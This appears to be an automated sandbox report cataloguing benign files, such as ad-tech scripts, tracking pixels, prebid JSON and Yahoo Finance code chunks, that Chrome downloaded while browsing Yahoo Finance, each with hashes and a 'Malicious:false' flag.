                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B296C7311263B3B153353904B0D65131ED72F70F9A646795C07CE8DD3735329A6D6AAD99BD1C0F74742FC9E515D7CA1E78F44377EBBA55018331A986C93481A0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://opus.analytics.yahoo.com/tag/opus-frame.html?referrer=https%3A%2F%2Ffinance.yahoo.com%2Fsectors%2Fbasic-materials%2F&tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383&axids=gam%3Dy-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A%26dv360%3DeS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B%26ydsp%3Dy-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A%26tbla%3Dy-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A&gdpr=false&gdpr_consent=&gpp=DBAA&gpp_sid=-1&us_privacy=1YNN&reset_idsync=1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html><html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta name="viewport" content="width=device-width,initial-scale=1"><script defer="defer">(()=>{"use strict";var t=function(t){if(t)return t;try{return document.location.hostname.match(/[\w]+\.([\w]+|co.uk)$/)[0]}catch(t){return""}};const e=function(e,n,r,o){(o||window.document).cookie="".concat(e,"=").concat(n,";Max-Age=").concat(31536e3,";Domain=").concat(t(r),";path=/;Secure;SameSite=None")},n=function(t){return new URLSearchParams(document.location.search.slice(1)).get(t)||""};var r,o=function(){var t=new Date("January 1, 2011 00:00:00 GMT").getTime()/1e3,e=(new Date).getTime()/1e3;return parseInt((e-t)/60/60,10)};!function(t){if(r&&!t)return r;var e=function(t){return parseInt(t,36)};r={};var n=function(t,e){for(var n="".concat(t,"="),r=(e||window.document).cookie.split(";"),o=0;o<r.length;o++){var a=(r[o]||"").trim();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1654), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1654
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.556175402880624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:jTg0n77+kFjkiUusyuqjuasedCKAHVGEq:N7pIfEjuafdCbIEq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C1E6CBEA76E135E9002F62520FEF85D6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:82339A9C4E3662688D94F91CB36613E58F3F4D25
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A6E2F96B8C4E4C9FFB8644F28A132F8B3133070CD73971D71C902C2BDDAB5947
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F02F6D7BA0DBD011590D1F4DB5AF062BC34C7B02CF0061228F860B1F01FC8F7A831D8637C5468ED0302FD2AB4807AB3DDABCAEB0A9BC76094EEBB441401A9B56
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://image6.pubmatic.com/AdServer/PugMaster?sec=1&async=1&kdntuid=1&rnd=66214172&p=0&s=0&a=0&ptask=ALL&np=0&fp=0&rp=1&mpc=0&spug=1&coppa=0&gdpr=0&gdpr_consent=&us_privacy=1YNN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:PubMatic.loadAsyncIframePixel('https://dis.criteo.com/dis/usersync.aspx?r=3&p=4&cp=pubmaticUS&cu=1&&gdpr=0&gdpr_consent=&url=https://simage2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTE5MjgmdGw9NDMyMDA=&piggybackCookie=uid:@@CRITEO_USERID@@');PubMatic.loadAsyncIframePixel('https://cms.quantserve.com/pixel/p-5aWVS_roA1dVM.gif?idmatch=0&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://x.bidswitch.net/sync?ssp=pubmatic&gdpr=0&gdpr_consent=&us_privacy=#US_PRIVACY');PubMatic.loadAsyncIframePixel('https://t.adx.opera.com/pub/sync?pubid=pub8730968190912');PubMatic.loadAsyncIframePixel('https://dsp-cookie.adfarm1.adition.com/?ssp=9&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://sync.srv.stackadapt.com/sync?nid=11&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://sync-tm.everesttech.net/upi/pid/b9pj45k4?redir=https://simage2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9MjE5MSZ0bD0yNTkyMDA=&piggybackCookie=${TM_USER_ID}&gdpr=1&gdp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (4816)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):211300
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4341045435107125
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6144:esB8cmh4pkx0Yb0wQE4AO925q8dqVimaFH:eVPaEUW
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:196D9E333AB445E1A674313C79F42F16
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:12B611093FBE9C40C0E9B63708C377D2FEB45AF4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:05DE5C8908714CC3DC1DAC9AC7659B9BD33257CC1F6B31E6990BC73E950F760A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6BBB6C7AE6BEACBF013E69F048C2721E80EA4E39A3230CE1D9CB49A1E43695A06BF617E6E21455D7BC4959B60AB495DC90E5AC45EC8F13ECF6610C54DC5A4966
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://pagead2.googlesyndication.com/pagead/managed/js/activeview/current/ufs_web_display.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:(function(){var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");},p=ca(this),.u=function(a,b){if(b)a:{var c=p;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.u("Symbol",function(a){if(a)return a;var b=function(f,g){this.ug=f;ba(this,"description",{configurable:!0,writable:!0,value:g})};b.prototype.toString=function(){return this.ug};var c="jscomp_symbol_"+(Math.random()*1E9>>>0)+"_",d=0,e=function(f){if(this instanceof e)t
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2226627197680635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUzRtwv+L1pse:1/se
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F837AA60B6FE83458F790DB60D529FC9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:14AF87CCEC7F81BB28D53C84DA2FD5A9D5925CDA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:DCECAB1355B5C2B9ECEF281322BF265AC5840B4688748586E9632B473A5FE56B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A85E09C3B5DBB560F4E03BA880047DBC8B4999A64C1F54FBFBCA17EE0BCBED3BC6708D699190B56668E464A59358D6B534C3963A1329BA01DB21075EF5BEDACE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://sync.targeting.unrulymedia.com/csync/RX-3fef85e6-bbf0-409a-a376-6c1ad497756a-003
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):108433
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.7560402780996998
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:GbA7Ls5Mm2hV5Mp9ShW0wJ8XvEZavQDOi15AobQoI01Jx9+gm6G3refUrKJMGtVk:/7f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3336CFDF96E1E27066FED0F9A2B90C8D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:924EAD7BC69B074CCD1DDBACD342E795AB2B912D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4F67D1D4EE2022832755ACB6EB9C5585B9E3641B6E4B7B7769949CBB11652139
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C17D67D3BD48C7EC0AF1846FB1F489F24498EFA55B9599B1F0D8B869EE51A8F15C7CB50FC516BC84210028B52CD7F814074CBD46B275CAEE05606BA5BEB7028E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{. "prebid": {. "adUnits": {. "us_yfin_main_dt_btm_center": {. "pos": 3,. "formats": {. "banner": {. "sizes": [. [. 728,. 90. ],. [. 970,. 250. ]. ]. }. },. "bidders": {. "yahooPrebidServer": {},. "yahooAds": {. "pos": "us_yfin_main_dt_btm_center". },. "pubmatic": {. "adSlot": "5537303". },. "rubicon": {. "zoneId": "3156558". },. "ix": {. "siteId": "1057906
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (21663)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):21664
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.53409032647791
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:JBwqXELu4Kc9XYtGedKrovroOlrosFbtro6Vx2TUrodmroOrofVP7BtQ+lHabXL8:JBDXEbXyKrovroOlrosFbtro6v2TUroF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6ADA5CE60E80C577BC5E20B9A9CD2873
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:27EDD0E993E14D0110A9D1DFDD903EDD8A955846
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D7939DFF42FCF30F8DEEFCBB95A00196553A3BFE414698C64F4FAC065ED2EDB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:FBDB53BBA9044C32743E035B3617A70FB0D31D581CEB3CCF9A5F79FDA07D6F2919171E63F9662B836FD74112F0A64F997BED52DA0E1DF0B4FD59F48CE1EE4ACE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/StoryItem.Dq_amti6.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as x,e as H,b as B,t as Q,d as U,f as q,j as E,h as X,i as S,q as N,k as C,l as P,n as Y,p as K,x as $e,m as ae,A as Ge,c as ei,O as p,L as z,G as Pe,a1 as Le,u as ii,g as li,a as ti,v as si,K as te}from"./scheduler.Dsuh-FKt.js";import{S as $,i as ee,c as R,b as A,m as j,t as g,a as b,d as V,g as W,e as G}from"./index.CvwOawEI.js";import{g as Ye,a as Je}from"./spread.CgU5AtxT.js";import{t as ie,aY as Ne}from"./commonUtil.BWwawKjd.js";import{I as ai}from"./Image.CSsvaScR.js";import{I as Qe}from"./Icon.C8w5V9EK.js";import{L as Xe}from"./Link.vSNQugO0.js";import{c as ni}from"./circle.D08G6-cW.js";import{S as ri}from"./StoryMetaPublishing.C_n46Tbl.js";import{e as se,u as fi,o as oi}from"./each.CI2tb2RB.js";import{T as mi}from"./Ticker.Cv4N1gRS.js";import{T as ui}from"./TopicPill.Bx-1k_kI.js";function ci(l){let e,t,i,s,a=ie("LIVE")+"",n,f;return t=new Qe({props:{icon:ni,type:"negative",size:"x-small"}}),{c(){e=H("div"),R(t.$$.fragment),i=B(),s=H("span"),n=Q(a),this.h()},l(r){e=U(r,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65508)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):940795
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.353012972977898
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:0Pn9O8VI15IVkDc1qME1w7riubkaYcNWV/dWnFOqvIplzohhcgZS9jhyz9yeL0Zd:qn9dVI15IVkDc1qME1w7riubkaYcNWV/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6F3F380EC66298FD110BF2F0E3BD118A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:7A738A7F7611E26DF075AA84C84240CBE4A0761A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E587C7C31C238B12351F5EABE23D3B9ED731BB0B4AF2E4749B05E2E271B07119
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:27D5831F0379F86DA10F03B23224E625560DAB9CA168AB6332F42B7B6C79D9A1DEAC2A6546470FFB64DA42E45101773A8AD7B41F4BCB62EF18B89E70208DE16B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://cdn.taboola.com/libtrc/impl.20240929-12-RELEASE.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! 20240929-12-RELEASE */..!function(e){e.TRC=e.TRC||{},e.TRC.sharedObjects=e.TRC.sharedObjects||{},e.TRC.sharedObjects.loadedScripts=e.TRC.sharedObjects.loadedScripts||{},e.TRC.sharedObjects.loadedPixels=e.TRC.sharedObjects.loadedPixels||{}}(window),function(){var win,doc;((e,t,r)=>{const i="trc_modal_hidden",o="trc_modal_mask",n="trc_modal_dialog",a="trc_close_modal",s=t.createElement("div"),l=t.createElement("div");let c,d="";function p(){u(l,i),u(s,i),r.dom.off(t,"keyup",m),r.dom.off(t,"click",g),r.dom.off(t.getElementById(a),"click",g),r.dom.off(e,"message",b)}function h(){u(l,o),u(l,i),u(s,n),u(s,i),w.appendChild(l),w.appendChild(s),t.body.appendChild(R),y(d),c=!0}const u=function(e,t){if(e.classList)return e.classList.add(t);r.dom.removeClass(e,t),e.className+=` ${t}`},m=e=>{const t=e.which||e.keyCode;27===t&&p()},g=e=>{const t=e.target||e.srcElement;t!==l&&t.id!==a||(r.dom.stopEvent(e),p())},b=e=>{/http(s)?:\/\/www\.taboola\.com/.test(e.origin)&&e.data&&1025==+e.data&&p()},f=f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):33360
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.835236614605854
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:L9JDhDZ358Io2xKN0RxKwrDqbh3f0megR7h7TOTYPO84sKIoyAbS:DFx+HTjr+bS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C531E6E93A8C3E74EDDE6B66E8C6E3C3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A4FCC786225E4F46F25D38E2FF3A21E51A01F6B1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D5843A96C5DE879700C6E353C5EBB7669E6E920FB61517B894E566CDA21EE1E3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:FC3A62CBE73D6E1CF4DAB6D5CC594B529082A549B5E6042F7370B8FB514C2AAB4A58E7FFBADBB0BB4998670856C686621EC6083AC52ED6E72D7D2F2F84B7ABFD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"/22888152279/us/yfin/ros/dt/us_yfin_ros_dt_top_center":["html",1,null,null,1,1,1,0,0,null,null,1,1,[["ID=879680693d2cc9bd:T=1727716993:RT=1727716993:S=ALNI_MYHiv_FVuF5sdjxZHSQSMLTpCg_Fw",1761412993,"/","yahoo.com",1],["UID=00000efef82e96bf:T=1727716993:RT=1727716993:S=ALNI_MYmMutNNy5kekedrdomWkuE6Rt98A",1761412993,"/","yahoo.com",2]],[138467550640],[6634140447],[5462617191],[3475794441],null,null,null,null,null,null,null,1,null,null,null,null,null,null,"AOrYGslHCje5s2LxCgu95kXheGlEP_BFdbNwt1jhX8Z08MDIV3AC79dWYl-WPQHbRWgvqx7iFId80fCMT7Z0GZ6c9cGLA5NMTgIjTJ8I9ASw7nkFGtdH","CO2nlq2X64gDFYqW_QcdgyU9Gg",null,null,null,null,null,null,null,null,null,null,null,null,null,null,"2",null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,[["ID=fa3fb5bd74bea4f9:T=1727716993:RT=1727716993:S=AA-AfjYH6hg1xat7H4shhG14V_zp",1743268993,"/","yahoo.com"]],[]]}.<!doctype html><html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script src="h
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (28722)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):28723
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.483731739045681
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:Sr8v+IVhP/mwJHf17iV1TZy6N7xIYy8sg/WFsl8VZ5RhY5h4oi+qZsfAF:7+I7PxN/RGOK2VjRAdqZN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0CE018C415316592E5FF56F303C96394
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:4123B0FCFA8C02C58D216C6172E537198CA2CAA5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:DCEAC8036DA8B44034E000B3ED27D27B54BE5C365D0E1E69C556F0B685C9949E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C0E7578BFB68BA7696975DC101442683EDA4FA9DD466CEB71A6C7FC01E52A0F0E234D0F094065773EDB2D8782A89073EC2A0C9AF035F59BAFC4252F79FCF8465
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Table.BmsyL-vx.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as $,p as V,k as S,n as R,i as p,y as $e,e as D,b as U,t as A,d as N,f as P,j as Y,h as L,q as y,O as Q,l as M,N as O,C as Ce,m as xe,A as at,a1 as ft,K as fe,Q as et,c as ct,L as J,u as ut,g as dt,a as mt,x as ce,o as _t,I as ht,a8 as gt,G as bt,Y as pt,X as oe}from"./scheduler.Dsuh-FKt.js";import{S as ee,i as te,g as j,a as I,e as X,t as C,c as G,b as Z,m as B,d as q}from"./index.CvwOawEI.js";import{g as ve,b as Ee,as as x,o as pe,q as he,N as Ie,s as kt,m as wt,an as De,ak as ge,Z as me,aM as Ne,aN as _e,aO as Pe,t as ne}from"./commonUtil.BWwawKjd.js";import"./PortfolioSymbolCount.svelte_svelte_type_style_lang.n39zXuiY.js";import{L as vt}from"./Link.vSNQugO0.js";import{E as St,D as yt,P as Ct}from"./EnhancedPill.eT1hwQep.js";import{B as tt}from"./Button.C2rixdaC.js";import{D as Me}from"./keyboard_arrow_down.BadFEUQj.js";import{U as Te}from"./keyboard_arrow_up.BbXWGy0y.js";import{g as Et,a as It}from"./spread.CgU5AtxT.js";import{D as Dt}from"./delete.BAHk4Xry.js";import{e as
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):218
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.492292882273651
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:UJXuMKT9TrLHXcDzYKFFyk1hjUMjUu3rqPMae:UJXW5LHXKYWl1djn7qPMae
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:1C6A3C2AB07CC6B5435DCB4A660A908D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A35250689DBC9BE6D92AC198C6878D8CF59A2D62
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:EE6EC9B2A6EDAFC657F56703A9A8DD313B3AF07849974AE425B9E8F822AD8698
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6FD8AE792BD1325BBB7DF78CABF2A1BD07C84F1D89661A779DC2630EE7268B07CAEB1F975D05582778D616B26F11966AC9722F22FA552570AF7EB1AE226968A5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uc/finance/cosaic/js/common-182f79bf.b2d6c2e368f3d31d8f5b.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-182f79bf.b2d6c2e368f3d31d8f5b.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[9478],{6028:()=>{}}]);
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (342)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):343
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.7715964339300605
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:aDEvXC2f1G0vXtVTvXvwRevX8V3qYOLXhLqUCo3c7W3OLXhL2eNvwR+:aDEfN9FftVTfZf8V3qYkXhWUb3WW3kXH
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:65ED963B2141D21177148FC652DE8827
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8A3445A1B66EBBD8BEEA882A5D92D727AA09B000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5AFDC25D22BB946EB262F0D81D15F62EC84AF5E6616393436A07FDF4513C6633
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:8A0AA4A70BB2A5BA3DE8D35590179F2A654A799C1A646E82C5BBD65AF98B97CD2F189497CD4F1F987EDBDC3F7267A235A0D71B60C16E2327F6D517B1D2B0D3FD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/PositionDeleteMessage.B-8pT6wm.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:h2.yf-t1mb2n.yf-t1mb2n{font-size:var(--font-3xl);font-weight:var(--font-bold)}h2.yf-t1mb2n.yf-t1mb2n,p.yf-t1mb2n.yf-t1mb2n{line-height:1.25}.title.yf-t1mb2n.yf-t1mb2n{margin-bottom:var(--space-4)}.isDock.yf-t1mb2n .title.yf-t1mb2n{font-size:var(--font-l);padding-bottom:var(--space-2)}.isDock.yf-t1mb2n .description.yf-t1mb2n{line-height:1.5}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (29594), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):29594
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.176931694017593
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:U9ohsHpxsgDD9G9uiQ9xYBEgH5CDE486Cfiniln7dB1Qg7Nx6/SRRzLC78eA1bOr:U4gDRNgtmSiniln7dB1QSm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:AD4B4808C249D200DF8BCDB043AC4611
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:80F6F690F592E8E1975CB27B9281B6F49FA81C66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:117A49648BFB149AE0636D4C6397DADBE8AAAB4EE5BB8A35DB9318379B7F6CA2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BD1124DD9EADDB5B10AAF23C4D270C06A4FF98C15542F38D7C878EE7DD4947EC42FB54838A5B8E2F3C5D80B0086503CE16BBB157F630C517998EA1646C05234E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/wf/wf-autocomplete-1.31.8-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-autocomplete",[],t):"object"==typeof exports?exports["wafer-autocomplete"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-autocomplete"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(i){if(a[i])return a[i].exports;var n=a[i]={i:i,l:!1,exports:{}};return e[i].call(n.exports,n,n.exports,t),n.l=!0,n.exports}var i=window.webpackJsonpwafer_wafers_wafer_autocomplete;window.webpackJsonpwafer_wafers_wafer_autocomplete=function(t,a,r){for(var o,s,l=0,u=[];l<t.length;l++)s=t[l],n[s]&&u.push(n[s][0]),n[s]=0;for(o in a)Object.prototype.hasOwnProperty.call(a,o)&&(e[o]=a[o]);for(i&&i(t,a,r);u.length;)u.shift()()};var a={},n={1:0,2:0};return t.e=function(e){function i(){s.onerror=s.onload=null,clearTimeout(l);var t=n[e];0!==t&&(t&&t[1](new Error("Loading chunk "+e+" failed.")),n[e]=void 0)}var a=n[
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
